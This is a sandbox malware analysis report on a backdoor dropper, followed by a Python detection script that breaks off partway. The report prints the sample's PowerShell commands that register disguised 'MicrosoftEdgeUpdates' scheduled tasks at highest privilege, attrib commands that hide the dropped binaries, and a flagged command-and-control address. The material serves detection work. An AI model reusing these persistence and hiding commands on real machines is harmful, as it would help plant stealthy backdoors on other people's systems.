

Windows Analysis Report
T1#U52a9#U624b1.0.1.exe

Overview

General Information

Sample name: T1#U52a9#U624b1.0.1.exe
renamed because the original name contains non-ASCII characters (Joe Sandbox escapes them as #Uxxxx)
Original sample name: T1助手1.0.1.exe (助手 = "assistant")
Analysis ID: 1581935
MD5: 477d3b9ee775c048f96b450dd00ba490
SHA1: 81f1991882b1bf1cb4b169da6c94b772517ab1eb
SHA256: 799084320848500fef5673799157b94c1db7b74f9651ffe0af326051973cf490
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Suspicious powershell command line found
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Uses Register-ScheduledTask to add task schedules
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Form action URLs do not match main URL
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • T1#U52a9#U624b1.0.1.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe" MD5: 477D3B9EE775C048F96B450DD00BA490)
    • T1#U52a9#U624b1.0.1.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe" MD5: 477D3B9EE775C048F96B450DD00BA490)
      • powershell.exe (PID: 7404 cmdline: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7544 cmdline: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7668 cmdline: attrib +s +a +h C:\Users\user\AppData\LineInst.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • attrib.exe (PID: 7704 cmdline: attrib +s +a +h C:\Users\user\AppData\WinHex.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • attrib.exe (PID: 7728 cmdline: attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • LineInst.exe (PID: 7804 cmdline: C:\Users\user\AppData\Roaming\../LineInst.exe MD5: AA2AD37BB74C05A49417E3D2F1BD89CE)
    • SetupHost.exe (PID: 7892 cmdline: "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web MD5: A5D94F9587F97E9C674447447721B77F)
  • WinHex.exe (PID: 7812 cmdline: C:\Users\user\AppData\Roaming\../WinHex.exe MD5: EFDC5DBA52333C0F5EEEDB0308FBE2D0)
    • WinHex.exe (PID: 7968 cmdline: C:\Users\user\AppData\Roaming\../WinHex.exe MD5: EFDC5DBA52333C0F5EEEDB0308FBE2D0)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • SystemUpdate.exe (PID: 8072 cmdline: C:\Users\user\AppData\SystemUpdate.exe MD5: 6BDDA8BA15F8F472FE7D065689E7D35D)
          • SystemUpdate.exe (PID: 8124 cmdline: C:\Users\user\AppData\SystemUpdate.exe MD5: 6BDDA8BA15F8F472FE7D065689E7D35D)
            • cmd.exe (PID: 8164 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 5696 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 3604 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7324 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7572 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7732 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7340 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4584 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7372 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1016 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 3912 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7952 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7504 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 652 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 1016 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 5744 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2300 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7008 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 480 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7336 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4924 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 4956 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 8008 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 6264 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6688 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4004 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 8024 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • vdsldr.exe (PID: 7932 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • chrome.exe (PID: 7440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 7752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 5292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=532930 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: File created; Sigma rule: Suspicious File Creation In Uncommon AppData Folder; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe, ProcessId: 7348, TargetFilename: C:\Users\user\AppData\LineInst.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' ", CommandLine: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe", ParentImage: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe, ParentProcessId: 7348, ParentProcessName: T1#U52a9#U624b1.0.1.exe, ProcessCommandLine: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' ", ProcessId: 7404, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7752, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-29T13:40:37.759404+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49905 | 8.212.101.195 | 1122 | TCP
(The flattened source does not delimit destination IP from destination port; 8.212.101.19:51122 is the other possible reading. The source port 49905 is in the Windows dynamic range either way.)
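The process tree above and the Sigma matches in this section show the persistence chain in four steps: the dropper writes LineInst.exe, WinHex.exe and SystemUpdate.exe directly into C:\Users\user\AppData (not Roaming or Local), registers two scheduled tasks through PowerShell with -RunLevel Highest whose action path is written as AppData\Roaming\..\<name>.exe, names them after Microsoft Edge updates, and hides the binaries with attrib +s +a +h; SystemUpdate.exe then polls schtasks /Query for the logon task. As an added example that is not part of the Joe Sandbox report, the following Python triage script runs detection logic for each of those steps over constructed Sysmon-style events built from the reported command lines. The event field names, the rule names and the benign VendorAgent control registration are assumptions.

```python
import ntpath
import re

# Constructed events modelled on Sysmon EventID 1 (process create) and EventID 11
# (file create); field names are assumed.  Command lines copy the report's process
# tree; the 'VendorAgent' registration is an assumed benign control.
PS_TASK_LINEINST = (
    "powershell -Command \" $Action = New-ScheduledTaskAction "
    "-Execute 'C:\\Users\\user\\AppData\\Roaming\\../LineInst.exe'; "
    "$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); "
    "$Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; "
    "Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal "
    "-TaskName 'MicrosoftEdgeUpdatesOnce' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' \""
)
# Second task from the tree: same shape, AtLogon trigger, WinHex.exe payload.
PS_TASK_WINHEX = (PS_TASK_LINEINST.replace("LineInst.exe", "WinHex.exe")
                  .replace("-Once -At (Get-Date)", "-AtLogon")
                  .replace("MicrosoftEdgeUpdatesOnce", "MicrosoftEdgeUpdatesOnceMe"))
CMD_ATTRIB = (
    'C:\\Windows\\system32\\cmd.exe /c "attrib +s +a +h C:\\Users\\user\\AppData\\LineInst.exe'
    '&&attrib +s +a +h C:\\Users\\user\\AppData\\WinHex.exe'
    '&&attrib +s +a +h C:\\Users\\user\\AppData\\SystemUpdate.exe"'
)
PS_TASK_BENIGN = (
    "powershell -Command \"Register-ScheduledTask -Action (New-ScheduledTaskAction "
    "-Execute 'C:\\Program Files\\Vendor\\agent.exe') -TaskName 'VendorAgent'\""
)
DROPPER = "C:\\Users\\user\\Desktop\\T1#U52a9#U624b1.0.1.exe"
POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"EventID": 11, "Image": DROPPER, "TargetFilename": "C:\\Users\\user\\AppData\\LineInst.exe"},
    {"EventID": 1, "Image": POWERSHELL, "ParentImage": DROPPER, "CommandLine": PS_TASK_LINEINST},
    {"EventID": 1, "Image": POWERSHELL, "ParentImage": DROPPER, "CommandLine": PS_TASK_WINHEX},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": DROPPER, "CommandLine": CMD_ATTRIB},
    {"EventID": 1, "Image": POWERSHELL, "ParentImage": "C:\\Program Files\\Vendor\\setup.exe",
     "CommandLine": PS_TASK_BENIGN},
]

_APPDATA_ROOT = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata$", re.IGNORECASE)
_EXECUTE = re.compile(r"-Execute\s+'([^']+)'", re.IGNORECASE)
_TASKNAME = re.compile(r"-TaskName\s+'([^']+)'", re.IGNORECASE)
_RUNLEVEL = re.compile(r"-RunLevel\s+(\w+)", re.IGNORECASE)
_ATTRIB = re.compile(r"attrib\s+((?:[+-][sahr]\s+)+)([^&\"]+)", re.IGNORECASE)


def resolve_path(path):
    """Collapse '..' and mixed separators the way Task Scheduler will when it runs the action."""
    return ntpath.normpath(path)


def in_appdata_root(path):
    """True when a file sits directly in <profile>\\AppData rather than in Local, Roaming or LocalLow."""
    return _APPDATA_ROOT.match(ntpath.dirname(resolve_path(path))) is not None


def parse_task_registration(cmdline):
    """Return (raw_action, resolved_action, task_name, run_level) for a Register-ScheduledTask call, else None."""
    if "register-scheduledtask" not in cmdline.lower():
        return None
    exe, name, level = (rx.search(cmdline) for rx in (_EXECUTE, _TASKNAME, _RUNLEVEL))
    raw = exe.group(1) if exe else ""
    return (raw, resolve_path(raw) if raw else "", name.group(1) if name else "",
            level.group(1) if level else "Limited")  # Limited is the cmdlet's default run level


def parse_attrib_hides(cmdline):
    """Return the paths an attrib command marks hidden (+h) or system (+s)."""
    return [resolve_path(path.strip()) for flags, path in _ATTRIB.findall(cmdline)
            if {"+h", "+s"} & set(flags.lower().split())]


def analyze(events):
    """Return (rule, subject, detail) findings for the persistence pattern in the report."""
    findings = []
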